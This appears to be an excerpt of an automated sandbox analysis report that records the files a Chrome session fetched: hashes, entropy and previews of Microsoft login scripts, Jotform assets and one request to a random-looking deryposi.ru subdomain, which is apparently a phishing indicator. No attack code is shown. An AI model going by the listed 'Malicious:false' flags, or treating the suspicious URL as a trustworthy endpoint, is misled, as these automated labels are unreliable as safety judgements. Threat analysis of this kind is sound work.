                                                                                                                                                                                                                                            Entropy (8bit):7.998672569942294
                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                            SSDEEP:6144:rLyDxN9RXGzPz8lxQWDj8xtjIEM4iBb6NQT7c:3yD7zGP8jTDjEpPcb6m3c
                                                                                                                                                                                                                                            MD5:934897EA9FAD777DE7A67F672C83BD1D
                                                                                                                                                                                                                                            SHA1:5C6B7A8097EB792627630415958D74EEF2F0C82E
                                                                                                                                                                                                                                            SHA-256:3CA4D4E7F1C7B15B1CB384F4F906E6C8E7E06C0FBA94C4D1BB9C432E5E3FB081
                                                                                                                                                                                                                                            SHA-512:392884619CCF9C71E0413CA5E5ECADF13C799DED7D2F2D58E7E4CF960C116562445FB501D5F57528895E95CD41E1D7A28173D8994CEBF2C6D19505543D0CB991
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://logincdn.msauth.net/shared/5/js/login_en_WFAOpz6ySoGyQC3VdQwrMQ2.js
                                                                                                                                                                                                                                            Preview:...........kw.. ....[7K.<.....[..q'.yu....=^..[L$R!);...~.'I9.>sf.....A.P(.U..........Y:.Y)7..$/.I....b&..*...iv$.......'/.>.U......l.,.1.........(D.....`.vd....Z.".W.!~R.Y.s.. .y|9.....<.....B..f_..s.^O.I..U..|..i..%./.9.?..^..e.....J....IQ..w.y.-.(..,.@....ju&..j..Vy.aOf3Y...%..r.............?.^..I!........P..F.....6.^Z.....FI4;.=....U....= ....'.>T..&._....:...8!....?.q.Z.Lb%....R...:.t>VZ.I.....|V.E..=Y..tQ.8qJ....D..|3tC...yQ..A.......$. Ag...Q..Q.)O.<>..p.w..f..v..i....m./.....8..u..*.@^..a>.Xh..A..9.d......A.c".nmM...89...... =8..+....nwN.Y.;.D._\. ...*.......W..x....+....Z......Mg...!.,...N.....vJJ._..J.....f*T%.*jy)....ID/@..C.q...M..c>.E.A.-.x...U...,i..>..B&@Wr&q.w..N...u....[2S...z.V.HN....<o+.#t4.'R..'..V..$.5...n..bg.D.....VL..2X.ZK%.E6v...`...n.,`...'..U.'.....V.,.....L.....R.i........7U.mq.Zd.|.PE..".|.E.4.g..\f..i@...8o-Y.r.gf......~.a.Te..Y.....v9-.@.1N.n7[.f0.$.)Ulw.ay..Z.+...<R...a..?..g.?....3..
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (41136), with no line terminators
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):41137
                                                                                                                                                                                                                                            Entropy (8bit):5.269641395050074
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:CNy+S+9SbGrBsfF/boJVzDf8oB05a+6sxQ2Sox/Gu:qS+9SbGrBsZbm05a+6sqxu
                                                                                                                                                                                                                                            MD5:EB0B91383091D8D0834A4D80E170DC34
                                                                                                                                                                                                                                            SHA1:384F1D70B5AA73FCFD81523A57EA89EEB715F871
                                                                                                                                                                                                                                            SHA-256:0803567823274F1C60D01116A7A559F37A2B24365326F18A093F3993FEEBC312
                                                                                                                                                                                                                                            SHA-512:6CCF15D74562B743243DC53E85DBCFC28E6874A2C84BA3093852C107874ACE2570DD05402C6C2B89E91BB3D1BFE2BB0F6BB25126BB65DCF805C032A00602885D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://cdn01.jotfor.ms/s/portal/674ac14411e/static/css/8953.c2dbea13.css
                                                                                                                                                                                                                                            Preview::root{--tagify-dd-color-primary:#3595f6;--tagify-dd-bg-color:white}.tagify{--tags-border-color:#ddd;--tags-hover-border-color:#ccc;--tags-focus-border-color:#3595f6;--tag-bg:#e5e5e5;--tag-hover:#d3e2e2;--tag-text-color:black;--tag-text-color--edit:black;--tag-pad:.3em .5em;--tag-inset-shadow-size:1.1em;--tag-invalid-color:#d39494;--tag-invalid-bg:rgba(211,148,148,.5);--tag-remove-bg:rgba(211,148,148,.3);--tag-remove-btn-color:black;--tag-remove-btn-bg:none;--tag-remove-btn-bg--hover:#c77777;--input-color:inherit;--tag--min-width:1ch;--tag--max-width:auto;--tag-hide-transition:.3s;--placeholder-color:rgba(0,0,0,.4);--placeholder-color-focus:rgba(0,0,0,.25);--loader-size:.8em;border:1px solid #ddd;border:1px solid var(--tags-border-color);cursor:text;box-sizing:border-box;outline:0;flex-wrap:wrap;align-items:flex-start;padding:0;line-height:1.1;transition:all .1s;display:flex;position:relative}@keyframes tags--bump{30%{transform:scale(1.2)}}@keyframes rotateLoader{to{transform:rotate(1tu
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (15845)
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):16274
                                                                                                                                                                                                                                            Entropy (8bit):5.366931692196057
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:oa3h998pqfjGjGIw9UveiFgeDNx8fz103eBsf:oKmw9Ungepxynsf
                                                                                                                                                                                                                                            MD5:D51F0731454569BC55A8E97325173207
                                                                                                                                                                                                                                            SHA1:9FF5CA189929176E99418FA78FD12E559C27EF8F
                                                                                                                                                                                                                                            SHA-256:A355A9F72BC3B79252611F14CCFA579B116E41C9198BD43B4AF97D3F3AAC7CC5
                                                                                                                                                                                                                                            SHA-512:87081711FB2F380D617B359C345E769B850990AC7E8CA25A64A0446CA74210EE8078EC5AF13147D8B07F06F63FE0D9BBFEA548D2CEF17FA84592457D60F7FE48
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://cdn03.jotfor.ms/s/portal/674ac14411e/static/js/7988.f937c1ff.js
                                                                                                                                                                                                                                            Preview:/*! For license information please see 7988.f937c1ff.js.LICENSE.txt */..!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="ec33327f-e33f-5d63-9d27-7c27340c3a43")}catch(e){}}();.(("undefined"==typeof self?this:self).chunkList=("undefined"==typeof self?this:self).chunkList||[]).push([["7988"],{1625:function(e){"use strict";var t=Object.getOwnPropertySymbols,n=Object.prototype.hasOwnProperty,r=Object.prototype.propertyIsEnumerable;e.exports=function(){try{if(!Object.assign)return!1;var e=new String("abc");if(e[5]="de","5"===Object.getOwnPropertyNames(e)[0])return!1;for(var t={},n=0;n<10;n++)t["_"+String.fromCharCode(n)]=n;if("0123456789"!==Object.getOwnPropertyNames(t).map((function(e){return t[e]})).join(""))return!1;var r={};return"abcdefghijklmnopqrst".split("").forEach((function(e){r[e]=e})),"abcdefghijklmnopqrst"===Object.keys
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):72
                                                                                                                                                                                                                                            Entropy (8bit):4.999941238143319
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:ltwDI2yvslN/Lla0URR:ltwDITvslN/LlHUD
                                                                                                                                                                                                                                            MD5:70725EEF069D71E70AFFE34C5C3464C1
                                                                                                                                                                                                                                            SHA1:D9591C96AE4C2D982C268D2D99AD6DBC099B4232
                                                                                                                                                                                                                                            SHA-256:9A4B5BECF21E5C9976BC5DDAE3F876E78B3D6271B8CE7D5AACE2CC7503127643
                                                                                                                                                                                                                                            SHA-512:3EECA237854F0FE9AFD61AC40AE012E51759B97A50D52215BA82A8EFA5F90EB34C373D4F520900B335EB16C7A7892744CE8B6923F33CA59163DA720FA9FF7AD2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSEAlwWwY0Nini5hIFDVd69_0=?alt=proto
                                                                                                                                                                                                                                            Preview:CjMKMQ1Xevf9GgQISxgCKiQIClIgChZAIS4jKiRfLT8rJi8lLCleKD06Jzs8EAEY/////w8=
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):1116
                                                                                                                                                                                                                                            Entropy (8bit):4.847937605692606
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5VOxvKIBxvKcIdVOxvKJLxvKJ7PBdVOxvK8xvKCIGVOxvKExvKqINs:+x7ZRx2sPUxtL2x5HN
                                                                                                                                                                                                                                            MD5:67F7000D16CA64A070B2EE07A94E4891
                                                                                                                                                                                                                                            SHA1:65253965886241865F7DB3C8BD5CC75C570B6926
                                                                                                                                                                                                                                            SHA-256:B7338951DD851E0317AD253AB2FF6B9F771643C61DC900B0AC238452F9D86A6E
                                                                                                                                                                                                                                            SHA-512:7BFF71AB4C6DF75BBD5A6D87C651AC8594D7E046BB300F7C1CD87845271E777B2A18C237B4BF72A5806998525F3E5E737D694CF88A25B1BB81438A54C1DCA554
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://cdn.jotfor.ms/fonts/?family=Circular:400:500:700
                                                                                                                                                                                                                                            Preview:@font-face {. font-family: "Circular";. src: url(https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Book.woff2) format("woff2"), url(https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Book.woff) format("woff");. font-display: swap;. font-style: normal;. font-weight: 400;.}..@font-face {. font-family: "Circular";. src: url(https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Italic.woff2) format("woff2"), url(https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Italic.woff) format("woff");. font-display: swap;. font-style: italic;. font-weight: 400;.}..@font-face {. font-family: "Circular";. src: url(https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Medium.woff2) format("woff2"), url(https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Medium.woff) format("woff");. font-display: swap;. font-style: normal;. font-weight: 500;.}..@font-face {. font-family: "Circular";. src: url(https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Bold.woff2) format("woff2"), url(https://cdn.jotfor.ms/fonts
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (47520)
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):47521
                                                                                                                                                                                                                                            Entropy (8bit):5.3981340461317835
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:11CQfmIG2Y8rHnzH5ei80aszzQhpdldr6F/PG2XvE2L79noBL5o6HBU91KL5Gc05:1a/0HnzH5eJdV0lGYv7f96Hjy
                                                                                                                                                                                                                                            MD5:7C92EC9D1395055CE0405A32607C7291
                                                                                                                                                                                                                                            SHA1:4EF0060484503E7A3D005254484D5A7FACF42F27
                                                                                                                                                                                                                                            SHA-256:A0DDAE0FB79C4A4A66D8613157A0703771FA9BE1A75790FCCF5EEEBAA329788B
                                                                                                                                                                                                                                            SHA-512:D5FAD8CE3B4B3603A6C48676E3F561437034F469875608FF1795505BFA89853A63767E32A1E65BC541DF18C555F93DB42896AA0C1EBD9B162EFC1899FE2D925B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (48786)
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):49207
                                                                                                                                                                                                                                            Entropy (8bit):5.485940577630699
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:+L+42Rhuu7AmIZZA+JYMrOhdDR/gk1pxjUSo2GXiefH0aeP89d5JV3yXmVK:Pp++MOlR/H1pxUSo2GSeLvTJ/K
                                                                                                                                                                                                                                            MD5:B57EE8A7B5BDA7F4801DF3EEAEDAA9B0
                                                                                                                                                                                                                                            SHA1:17C9FB906586C971337553606CDBDC098DE20499
                                                                                                                                                                                                                                            SHA-256:3538F9FCD63BEA1031A4AA80FEFCA5A3073EF214637A16145593E8745EA9223C
                                                                                                                                                                                                                                            SHA-512:640E0D6AFF34BBEA42D25D4317211E7A1FB255983F027BE83A79A3564A673AC4BF8EDAF984753871BD811C64AD802597DC06309D413846B4D891870CD6A15BD9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://cdn03.jotfor.ms/s/portal/674ac14411e/static/js/8508.337c9fc2.js
                                                                                                                                                                                                                                            Preview:"use strict";.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="6fbb0b50-9c59-5fa1-912c-acfdf2df6a5b")}catch(e){}}();.(("undefined"==typeof self?this:self).chunkList=("undefined"==typeof self?this:self).chunkList||[]).push([["8508"],{91918:function(e,o,t){t.d(o,{F4:function(){return O},fh:function(){return s}});var E=t(24840),r=t(60097),_=t(40991),a=t(31157),n=t(45615);const i=new E.m("/API",{interceptorConfig:{teamID:t.g.teamID,customResponseInterceptors:[r.D.requestManagerResponseNormalizer]}}),s=e=>{if((0,_.ko)())return;const o=new URLSearchParams,{lastProductAssetInteraction:t}=e;return t&&o.append("last_product_asset_interaction",t),i.post("ep/user/hubspot-contact-form",o)},O=({asset:e,target:o,action:t,intent:E})=>{if((0,n.BB)()){const r={project:a.ib.ENTERPRISE_PROMOTIONS,asset:e,target:o,action:t};E&&(r.intent=E);const
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):42208
                                                                                                                                                                                                                                            Entropy (8bit):7.906706254721029
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:w56lFOj0iT989VdMOgPecEcoKfPTrCuVJAnoQjI:A/Yn9VdUvpfbeuUI
                                                                                                                                                                                                                                            MD5:18323C1298B0D1B93EF749682972E890
                                                                                                                                                                                                                                            SHA1:A38A9754A9435A90AFFD782690E4EEC7B3DF58B1
                                                                                                                                                                                                                                            SHA-256:A0FE0078C32DCDA4817B6261B939D995782876916069E313229915B76F6489BF
                                                                                                                                                                                                                                            SHA-512:C4FFE6C30F6172A76E828A40FE0A29F6CEC7A803AC637AE9B3C041AC3119BFC9902FAD6286BAD809CEE0ABA19AE66DDC9F197E94745F1FD55B45D09BC70810EF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:.PNG........IHDR..............x......sRGB....... .IDATx^..wTW...A9.$.I".`..........{7..n..6.16.I&. r.......(.U.S..}....JUg..Zs.=...._F....#`..@...a.....b...0.F.........0.F....."`...M.....0.F....X....0.F..d.....n..l....0.F...2`....0.F ....dp.d#`....0.&...#`....0..D.. ...%..#`....0.....#`..... .&...t/....#`.....e....#`..@..0...{.F....#`.L.,.F....#`.2...@.7.K6.F....#`.`.0.F....#.A.L.2..^..0.F........0.F....."`...M.....0.F....X....0.F..d.....n..l....0.F...2`....0.F ....dp.d#`....0.&...#`....0..D.. ...%..#`....0.....#`..... .&...t/....#`.....e....#`..@..0...{.F....#`.L.,.F....#`.2...@.7.K6.F....#`.`.0.F....#.A.L.2..^..0.F........0.F....."`...M.....0.F....X....0.F..d.....n..l....0.F...2`....0.F ....dp.d#`....0.&...#`....0..D.. ...%..#`....0.....#`..... .&...t/....#`.....e....#`..@..0...{.F....#`.L.,.F....#`.2...@.7.K6.F....#`.`.0.F....#.A.L.2..^..0.F........0.F....."`...M.....0.F....X....0.F..d.....n..l....0.F...2`....0.F ....dp.d#`....0.&...#`....0..D.. ...%..#`....0.....
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142367
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):49911
                                                                                                                                                                                                                                            Entropy (8bit):7.994516776763163
                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                            SSDEEP:1536:vr2T/J/l2R6ACJVMQPYmlBXTm12g9bcKo0y0ci:CzJ/lG2KQzBjm1b3ci
                                                                                                                                                                                                                                            MD5:9B96CC09F9E89D0334BA2FBC22B5197A
                                                                                                                                                                                                                                            SHA1:B5FE69F39E9F61FEF88DF794F02DC4F4086E2592
                                                                                                                                                                                                                                            SHA-256:E6331018533143C411BAE25326AB52FCED541C48674551AEA78E750855BDCD1D
                                                                                                                                                                                                                                            SHA-512:2BDD71A34A7D6172AD4B7B6CF077A891D6266C148000EEF8345E2343E6C21ED8783B2EA328EF3BF7176462A3CA575D2D6D4B55A07138CFD1B02900C95F61077D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js
                                                                                                                                                                                                                                            Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):523
                                                                                                                                                                                                                                            Entropy (8bit):5.400597195610864
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:EuvCjvCoHUI7lU4I7IvUI51gDGH4LOaOvCaKfuSdOBMPNw7DOBMy:7Q1HUI7/I7IvUIbgqHHVvCa2uSggNEOh
                                                                                                                                                                                                                                            MD5:B1D1C4C5BF1BB759C4CA1D51F6F46074
                                                                                                                                                                                                                                            SHA1:4888B84607D96D2625FB26F8E0BBAE0196C36583
                                                                                                                                                                                                                                            SHA-256:0D1A937337A44BCFCBFE757DD01C2564BEA02C19A52F617475F3CEC3472E6526
                                                                                                                                                                                                                                            SHA-512:18C415CC522A05BED69278E3CA8AB08C8BB721B348E7054250D276798C697437C73C7722178AB0F34045C560A2DA252314F7381478B88472F260A08FB0BCA1EE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://cdn03.jotfor.ms/s/portal/674ac14411e/static/js/jotform.css.a4a80bcb.js
                                                                                                                                                                                                                                            Preview:"use strict";(("undefined"==typeof self?this:self).chunkList=("undefined"==typeof self?this:self).chunkList||[]).push([["7222"],{92976:function(){},43911:function(){},48200:function(){},79560:function(){}}]);.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="dff5124c-9e72-5657-a2cc-d1312ab6f742")}catch(e){}}();.//# debugId=dff5124c-9e72-5657-a2cc-d1312ab6f742.
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65254)
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):83118
                                                                                                                                                                                                                                            Entropy (8bit):5.637242220528819
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:zfWsJ38ceP5xO3ritKs51gwe3qThU2Si/gE9:zlV8ce67iJo3qVRoE9
                                                                                                                                                                                                                                            MD5:5D9CC235352BD4D92C0DB3A0D6DBCF45
                                                                                                                                                                                                                                            SHA1:19B9ED063298D045A52F9B094CE8E58615B30C2F
                                                                                                                                                                                                                                            SHA-256:362E3E6B4A895CA6E0CBABE8F347D10811E59AEA6C82193ED50E6BD98A564B2B
                                                                                                                                                                                                                                            SHA-512:700DDD8752BB3362B09AFE872CF30C0DD249E86C6774248144B959B037BB0C93ED37CE15C5FF3AB36523BAC64F8E2B9970E81A1204692A37B209E828A9C3BDA2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:"use strict";.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="e7c7d559-42e9-55b4-adc2-3817e7485f0b")}catch(e){}}();.(("undefined"==typeof self?this:self).chunkList=("undefined"==typeof self?this:self).chunkList||[]).push([["6354"],{15373:function(e,t,n){n.d(t,{Z:function(){return gn}});var i=n("20366"),s=n("94653"),o=n("37897"),a=n("11268"),r=n.n(a),l=n("32358"),c=n("58935"),d=n("50728"),u=n("57665"),p=n("65301");const m={LOGIN_FLOW:"loginFlow",ACCOUNT_SETTINGS:"accountSettings"},g={TOTAL_SUBMISSONS:"totalSubmissions",PAYMENTS:"payments",FORMS:"formCount",AI_AGENTS:"aiAgents",AI_CONVERSATIONS:"aiConversations",SIGNED_DOCUMENTS:"signedDocuments",WORKFLOW_RUNS:"workflowRuns",SUBMISSONS:"submissions",UPLOAD_SPACE:"uploads",FORM_VIEWS:"views"},h="total_submissions",v="payments",_="form_count",C="ai_agents",A="ai_conversations",E=
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://sh81xdbszq0gozj9jyxyzajxmxsyl2omho07oxsdwphufgugjbwcyyem.deryposi.ru/bXsQrxXYFsYVrgqTWHzsoezSpBZQNYHYTYFXZUAAVELNZAUTFWC
                                                                                                                                                                                                                                            Preview:1
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 58433
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):15125
                                                                                                                                                                                                                                            Entropy (8bit):7.986030066929702
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:qab+ZhcazgYZeTpvoGyxC5S+W18Lbucsp55ZVaaJPBKm1GYFA9S/xuer0Jwx3ew6:qvJeV8c8+hsrVxJPbGiAs/c40JwdvoR
                                                                                                                                                                                                                                            MD5:3F267BE29D56D90028928760092A1260
                                                                                                                                                                                                                                            SHA1:7662FC982E8B2EF4551DB0DAFD44E21209A2C515
                                                                                                                                                                                                                                            SHA-256:D4691B8E14E7BD02DCE3CCAFFCF390AC4BFD533A717532D173B4343D78C910F6
                                                                                                                                                                                                                                            SHA-512:0C8B2B81BBD7531977E91E63DB6F49CF0B35B63531658038D335F92A509CA07D716441441DA17DF585672C7854908DA2DB333FC000E254FD0602FA27E4A76459
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://logincdn.msauth.net/shared/5/chunks/gamepad-navigation_838be5794eb9c3ab9cd1.js
                                                                                                                                                                                                                                            Preview:...........}ks.H.....$.....Rj..4.u[v.c..n.t......1.p..../3.*.@......h..........2O..7...^.o..6^|z~]...6E..i..w.ERT..GG...f.`...k.6...9.?....pU..2.R......z...%....^.yU..$.K...w[..z..6..z0.3.4LJ..e..w;>..._.7.$+.....<..IA.>.v;?..NP.>.r^Vy.%=.Gz.E.e....D........n..0..>P.."^...a.N....=...Od.J...0\d)4S-....t..2L..../o.-....\.W..C[......W..&..E....i.1.............|.o.|.L.....a..O.{.{.. VB.../.6.<7.2\......aD>...d.h.....~"*./...."..F....2Ky...C.4f7..!..''...q.....:.n{|.Va......~.>...,..W).,{qY...YO...Y.../.....t........K.c.K.SY....d....m...].7...Z...../.........UQ...Q.\C.H...}.6..4.x....... .pb......G....2...v..Z..E...x.O~..e....e...@.=..W...{_.Q.~<...P...&+..X-#.G8/b.."J.....$.g.<..G.)..%(..<..2....lY.....Z.....B...,Oy.b.q.D%,..K....]...YZ.P_.J.....L/x./._f9f.n2@...v......Y..M....!..M......f9..,.3.@...Q.gP.&.AT.....D... .)....(..Pq..~........_..s4.......4.U...I%..*.._.........F.b.......#.\.i.V.....U.QL..3`..lQ...d.l....911[!U.A......03
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):5525
                                                                                                                                                                                                                                            Entropy (8bit):7.961202222662501
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:dySl6/e7OAQD3cS66g8cxO4qXgy66F0+fgENU28TjN3KY6meSsj0ktMvB4YJix2I:dNl6/zFDW6dlXV665ReB67j0sEBWxl
                                                                                                                                                                                                                                            MD5:28CE5BF8BACB96D1C2CFA0092145C6EE
                                                                                                                                                                                                                                            SHA1:303A4629C4467AF2C551EC9E6353464C8C25827D
                                                                                                                                                                                                                                            SHA-256:6B89EEC14865DB53FE20FB3C70B0853362E21669DACE19C06172F673B2EDC5CD
                                                                                                                                                                                                                                            SHA-512:6A10794F105EF5C6F7F7DC2C89152A8342E6D9D8D9490783863ED2737FFD5982E916F72E0A9ECB944AB9815FA70BD20C7256A91E2A62D971F80C23822B809A02
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
